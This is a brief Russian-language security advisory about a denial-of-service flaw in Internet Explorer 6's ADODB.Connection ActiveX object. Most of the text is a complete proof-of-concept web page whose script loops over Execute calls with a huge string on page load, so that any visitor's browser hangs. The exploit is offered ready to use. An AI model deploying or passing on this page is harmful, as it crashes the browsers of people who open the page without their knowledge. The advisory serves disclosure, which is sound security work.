Программа: MS Internet Explorer 6

Уязвимость позволяет злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в использовании ActiveX объекта ADODB.Connection при вызове функции «Execute». Атакующий может сформировать злонамеренную страницу на веб сайте, при посещении которой браузер пользователя зависнет.

Пример:

<html>
<head>
<title>ADODB.Connection.Execute CRASH TEST</title>
</head>
<script>
function Bang_Bang() {
var a = new ActiveXObject('ADODB.Connection.2.7');
var b = 'FUCK';
while (b.length <= 1024*256) b+=b;
for (var i = 0; i < 32768; i++)
try { a.Execute(b,b,b); } catch(e) {}
}
</script>
<body onLoad='Bang_Bang()'>
<center><h1>WOW!!! Are U live?</h1></center>
</body></html>



Оставить мнение